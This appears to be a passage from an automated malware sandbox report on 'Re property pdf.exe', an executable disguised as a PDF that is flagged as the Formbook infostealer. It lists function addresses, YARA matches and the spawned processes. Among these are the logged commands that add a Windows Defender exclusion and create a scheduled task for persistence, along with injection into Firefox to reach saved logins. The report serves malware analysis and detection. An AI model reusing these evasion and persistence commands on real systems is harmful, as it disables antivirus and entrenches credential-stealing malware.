            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010C006_2_01010C00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0CB56_2_010B0CB5
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000CF26_2_01000CF2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01052F286_2_01052F28
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030F306_2_01030F30
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B2F306_2_010B2F30
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01084F406_2_01084F40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108EFA06_2_0108EFA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002FC86_2_01002FC8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CEE266_2_010CEE26
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010E596_2_01010E59
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022E906_2_01022E90
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CCE936_2_010CCE93
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CEEDB6_2_010CEEDB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010DB16B6_2_010DB16B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104516C6_2_0104516C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101B1B06_2_0101B1B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFF1726_2_00FFF172
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010170C06_2_010170C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BF0CC6_2_010BF0CC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C70E96_2_010C70E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CF0E06_2_010CF0E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C132D6_2_010C132D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0105739A6_2_0105739A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010152A06_2_010152A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFD34C6_2_00FFD34C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102B2C06_2_0102B2C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B12ED6_2_010B12ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102D2F06_2_0102D2F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C75716_2_010C7571
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AD5B06_2_010AD5B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D95C36_2_010D95C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CF43F6_2_010CF43F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010014606_2_01001460
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CF7B06_2_010CF7B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010556306_2_01055630
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C16CC6_2_010C16CC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A59106_2_010A5910
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010199506_2_01019950
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102B9506_2_0102B950
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107D8006_2_0107D800
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010138E06_2_010138E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CFB766_2_010CFB76
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102FB806_2_0102FB80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01085BF06_2_01085BF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104DBF96_2_0104DBF9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CFA496_2_010CFA49
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C7A466_2_010C7A46
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01083A6C6_2_01083A6C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01055AA06_2_01055AA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010ADAAC6_2_010ADAAC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B1AA36_2_010B1AA3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BDAC66_2_010BDAC6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01013D406_2_01013D40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C1D5A6_2_010C1D5A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C7D736_2_010C7D73
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102FDC06_2_0102FDC0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01089C326_2_01089C32
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CFCF26_2_010CFCF2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CFF096_2_010CFF09
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01011F926_2_01011F92
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CFFB16_2_010CFFB1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD3FD56_2_00FD3FD5
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD3FD26_2_00FD3FD2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01019EB06_2_01019EB0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_011DD5BC7_2_011DD5BC
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_073707B07_2_073707B0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_073707A17_2_073707A1
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_073792687_2_07379268
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_073792587_2_07379258
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 7_2_07372AB27_2_07372AB2
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181010012_2_01810100
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0186600012_2_01866000
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018A02C012_2_018A02C0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182053512_2_01820535
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181C7C012_2_0181C7C0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0184475012_2_01844750
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182077012_2_01820770
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183C6E012_2_0183C6E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018229A012_2_018229A0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183696212_2_01836962
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185889012_2_01858890
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018068B812_2_018068B8
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0184E8F012_2_0184E8F0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182A84012_2_0182A840
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182284012_2_01822840
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181EA8012_2_0181EA80
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01838DBF12_2_01838DBF
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01828DC012_2_01828DC0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181ADE012_2_0181ADE0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182AD0012_2_0182AD00
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182ED7A12_2_0182ED7A
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01810CF212_2_01810CF2
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01820C0012_2_01820C00
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0189EFA012_2_0189EFA0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01812FC812_2_01812FC8
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01862F2812_2_01862F28
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01840F3012_2_01840F30
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01894F4012_2_01894F40
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01832E9012_2_01832E90
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01820E5912_2_01820E59
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182B1B012_2_0182B1B0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185516C12_2_0185516C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0180F17212_2_0180F172
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018233F312_2_018233F3
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0180D34C12_2_0180D34C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018252A012_2_018252A0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183B2C012_2_0183B2C0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183D2F012_2_0183D2F0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182349712_2_01823497
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018674E012_2_018674E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0181146012_2_01811460
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182B73012_2_0182B730
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182599012_2_01825990
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0182995012_2_01829950
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183B95012_2_0183B950
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018238E012_2_018238E0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0188D80012_2_0188D800
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183FB8012_2_0183FB80
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01895BF012_2_01895BF0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185DBF912_2_0185DBF9
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01893A6C12_2_01893A6C
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0183FDC012_2_0183FDC0
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01823D4012_2_01823D40
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01839C2012_2_01839C20
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01899C3212_2_01899C32
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01821F9212_2_01821F92
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01829EB012_2_01829EB0
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597655116_2_05976551
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597655A16_2_0597655A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597ECCA16_2_0597ECCA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597479F16_2_0597479F
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_059747FA16_2_059747FA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597677A16_2_0597677A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597CEAA16_2_0597CEAA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597B61A16_2_0597B61A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_059951DA16_2_059951DA
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: String function: 01867E54 appears 96 times
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: String function: 0188EA12 appears 36 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 01045130 appears 58 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 0108F290 appears 103 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 00FFB970 appears 262 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 0107EA12 appears 86 times
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: String function: 01057E54 appears 107 times
            Source: Re property pdf.exe, 00000000.00000002.1786169778.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000002.1791759190.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000000.1735631909.00000000009BE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEEW.exe6 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000000.00000002.1795716307.0000000008C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Re property pdf.exe
            Source: Re property pdf.exe, 00000006.00000002.2172585991.00000000010FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Re property pdf.exe
            Source: Re property pdf.exeBinary or memory string: OriginalFilenameEEW.exe6 vs Re property pdf.exe
            Source: Re property pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Re property pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hwOHPmqcegxcxb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, weWwPlZVfk5tlcGN3Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, weWwPlZVfk5tlcGN3Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, weWwPlZVfk5tlcGN3Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/12@15/9
            Source: C:\Users\user\Desktop\Re property pdf.exeFile created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMutant created: NULL
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMutant created: \Sessions\1\BaseNamedObjects\GZdhCKjbNSalCbZtEh
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
            Source: C:\Users\user\Desktop\Re property pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4EB6.tmpJump to behavior
            Source: Re property pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Re property pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Re property pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4211371395.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Re property pdf.exeReversingLabs: Detection: 91%
            Source: C:\Users\user\Desktop\Re property pdf.exeFile read: C:\Users\user\Desktop\Re property pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
